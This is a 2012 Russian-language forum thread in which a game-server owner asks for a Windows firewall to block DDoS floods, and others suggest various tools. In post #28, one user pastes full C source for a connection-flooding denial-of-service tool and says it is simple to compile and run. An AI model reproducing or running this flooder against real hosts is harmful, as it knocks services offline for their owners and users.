• Страница 1 из 2
  • 1
  • 2
  • »
Модератор форума: No_MaTTeR, Dimitro, LightInDarkness  
Форум » Полезное » Флудилка » Какой фаервол установить?
Какой фаервол установить?
Hellmourne
Hellmourne
Капрал
Репутация: 285
Доброго времени суток.
Сначала не задумывался от ддос атаках сервера , думал что школьники стали менее агресивны , а нормальный ддос очень дорогой ( ну от него защита и не требуется ).
В общем защита сайта от ддоса стоит , но вот сервер стоит без защиты и его просто ложут от закидывания портов сервера разными пакетами ( то есть от спрута ).
Посоветуйте нормальный фаервол , который защищает от ддоса ( то есть чтобы он следил за тем , чтобы количество потоков с 1 ипа не превышало N количество ).
С меня +

Добавлено (12.02.2012, 19:18)
---------------------------------------------
Попробывал сейчас 2 фаервола.
И оба они не идут на ОС Windows Server 2008 Standard

Сообщение # 1 написано 12.02.2012 в 19:18
EvilSky
EvilSky
Рыцарь
Репутация: 123
Outpost .
Учи английский правильно
Поохотимся вместе?
Сообщение # 2 написано 12.02.2012 в 19:22
Hellmourne
Hellmourne
Капрал
Репутация: 285
EvilSky, Как он в настройке и использовании?
Сообщение # 3 написано 12.02.2012 в 19:24
VISO
VISO
/dev/null
Репутация: 421
Hellmourne, на удалённом сервере при установке фаерволла есть хороший шанс больше на этот сервер не зайти smile
:3
Сообщение # 4 написано 12.02.2012 в 19:24
Hellmourne
Hellmourne
Капрал
Репутация: 285
VISO, Да , мне про такое то же говорили.
Сообщение # 5 написано 12.02.2012 в 19:25
VISO
VISO
/dev/null
Репутация: 421
Hellmourne, любой фаерволл при установке сразу же блокирует сеть, для последующей настройки smile
:3
Сообщение # 6 написано 12.02.2012 в 19:28
Hellmourne
Hellmourne
Капрал
Репутация: 285
VISO, Как же мне просто спастись от школьников со спрутом?
Как то напрягает когда школьник над тобой стебается , что вот он имбо положил тебя спрутом.
И как то не ок когда видишь какой тебя ип ддосит , а ты его не можешь заблокировать.
Через CMD можно ип заблочить?
Сообщение # 7 написано 12.02.2012 в 19:29
OmgThisIsSparta
OmgThisIsSparta
Скаут
Репутация: 38
Quote (Hellmourne)
Как же мне просто спастись от школьников со спрутом?
Как то напрягает когда школьник над тобой стебается , что вот он имбо положил тебя спрутом.
И как то не ок когда видишь какой тебя ип ддосит , а ты его не можешь заблокировать.
Через CMD можно ип заблочить?


через CMD нельзя - насколько мне известно.
в чем проблема, почему не Linux? Был бы Linux, без проблем помог бы..
Сообщение # 8 написано 12.02.2012 в 19:31
Leviathan
Leviathan
Скаут
Репутация: 619
никакой
Сообщение # 9 написано 12.02.2012 в 19:31
Hellmourne
Hellmourne
Капрал
Репутация: 285
OmgThisIsSparta, я пока что еще новичек в этом деле.
Так сказать начинаю с самого легкого , а там уже и познаешь , что сложнее.
Какой будет толк , если я установлю сервер на Linux и ничего не смогу сделать? ( Если еще даже установлю ).

Добавлено (12.02.2012, 19:38)
---------------------------------------------
OmgThisIsSparta, ну если нельзя заблокировать ип ддосера через CMD.
То что же можно сделать? С фаерволом меня пугают , что может не пустить потом на хост.
Есть ли еще выход кроме фаервола?
Я думаю , что все равно с помощью cmd как то можно убить ддос

Добавлено (12.02.2012, 19:44)
---------------------------------------------
up

Сообщение # 10 написано 12.02.2012 в 19:44
VISO
VISO
/dev/null
Репутация: 421
http://greentracery.narod.ru/winsecurity/winipsec.html
Попробуй
:3
Сообщение # 11 написано 12.02.2012 в 19:54
Hellmourne
Hellmourne
Капрал
Репутация: 285
VISO, Хм ..

Добавлено (12.02.2012, 20:28)
---------------------------------------------
Не , не ок.
Ап

Сообщение # 12 написано 12.02.2012 в 20:28
VISO
VISO
/dev/null
Репутация: 421
Hellmourne, заддось ддосера biggrin
:3
Сообщение # 13 написано 12.02.2012 в 20:30
Nyll
Nyll
Репутация: 2374
сменить порты?
Маме беркута привет!
Сообщение # 14 написано 12.02.2012 в 20:32
TesCommunity
TesCommunity
Скаут
Репутация: 632
iptables up
Сообщение # 15 написано 12.02.2012 в 20:33
VISO
VISO
/dev/null
Репутация: 421
Nyll, разницы? Будет по другим портам
:3
Сообщение # 16 написано 12.02.2012 в 20:34
Nyll
Nyll
Репутация: 2374
p.s поставь Касперский. Хоть да бредово звучит но он поможет smile
Маме беркута привет!
Сообщение # 17 написано 12.02.2012 в 20:34
VISO
VISO
/dev/null
Репутация: 421
Hellmourne, wipfw
:3
Сообщение # 18 написано 12.02.2012 в 20:35
TesCommunity
TesCommunity
Скаут
Репутация: 632
Quote (Nyll)
поставь Касперский

Его положат 300 открытых соединений.
Сообщение # 19 написано 12.02.2012 в 20:35
Nyll
Nyll
Репутация: 2374
Quote (TesCommunity)
Его положат 300 открытых соединений.

спрут стока выдаст?
Маме беркута привет!
Сообщение # 20 написано 12.02.2012 в 20:36
VISO
VISO
/dev/null
Репутация: 421
Nyll, каспийский? Звучит смешно smile
:3
Сообщение # 21 написано 12.02.2012 в 20:37
TesCommunity
TesCommunity
Скаут
Репутация: 632
Nyll, если досят спрутом,нет,если обычным syn флудером,да.
Сообщение # 22 написано 12.02.2012 в 20:37
Nyll
Nyll
Репутация: 2374
Quote (VISO)
Nyll, каспийский? Звучит смешно

В нем есть файервол.
Маме беркута привет!
Сообщение # 23 написано 12.02.2012 в 20:38
Nyll
Nyll
Репутация: 2374
Quote (TesCommunity)
Nyll, если досят спрутом,нет,если обычным syn флудером,да.

Ок теперь вопрос: Школота умеет ддосить через syn? Я сомневаюсь.
Маме беркута привет!
Сообщение # 24 написано 12.02.2012 в 20:39
VISO
VISO
/dev/null
Репутация: 421
Quote (Nyll)
В нем есть файервол.

В ладе калине есть кондиционер, но мы все прекрасно знаем, как он работает
:3
Сообщение # 25 написано 12.02.2012 в 20:39
Hellmourne
Hellmourne
Капрал
Репутация: 285
Nyll, Можешь дать ссылку на ок каспера?
Quote (VISO)
wipfw

Я не знаю , как его настроить.
Сообщение # 26 написано 12.02.2012 в 20:39
VISO
VISO
/dev/null
Репутация: 421
Quote (Hellmourne)
Можешь дать ссылку на ок каспера?

Тут
:3
Сообщение # 27 написано 12.02.2012 в 20:41
TesCommunity
TesCommunity
Скаут
Репутация: 632
Quote (Nyll)
Ок теперь вопрос: Школота умеет ддосить через syn? Я сомневаюсь

Исходник син флудера:
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/stat.h>
#include <fcntl.h>
#define MAX_CON 91025 /* You may have to change this, depending on your OS */
int main(int argc, char *argv[]) {
if(argc < 3) {
printf("Usage: %s <host> <port>\n", argv[0]);
exit(-1);
}

int sock[MAX_CON];
int i;
struct sockaddr_in dest[MAX_CON];
struct hostent *host;
if((host = gethostbyname(argv[1])) == -1) {
printf("Couldn't resolve %s!\n", argv[1]);
exit(-1);
}

for(i = 0; i <= MAX_CON; i++) {
if((sock[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Couldn't create socket!\n");

// exit(-1);
for(;i >= 900; i--)
{
close(sock[i]);
}
/* break; */
}

dest[i].sin_family = AF_INET;
dest[i].sin_port = htons(atoi(argv[2]));
dest[i].sin_addr = *((struct in_addr *)host->h_addr);

if(connect(sock[i], (struct sockaddr *)&dest[i], sizeof(struct sockaddr)) == -1) {
printf("Couldn't connect to %s on port %s!\n", argv[1], argv[2]);
// exit(-1);
}

printf("%d : Connected!\n", i);
}
printf("Exit\n");
int a;
scanf(" %i", &a);
return(0);
}
Скомпилировать и запустить,думаю тут и младенец разберется.
Сообщение # 28 написано 12.02.2012 в 20:41
Hellmourne
Hellmourne
Капрал
Репутация: 285
VISO, Не панось Калину , мне приходится на ней ездить biggrin
Сообщение # 29 написано 12.02.2012 в 20:41
Nyll
Nyll
Репутация: 2374
Hellmourne, Тык
Маме беркута привет!
Сообщение # 30 написано 12.02.2012 в 20:41
Форум » Полезное » Флудилка » Какой фаервол установить?
  • Страница 1 из 2
  • 1
  • 2
  • »
Поиск: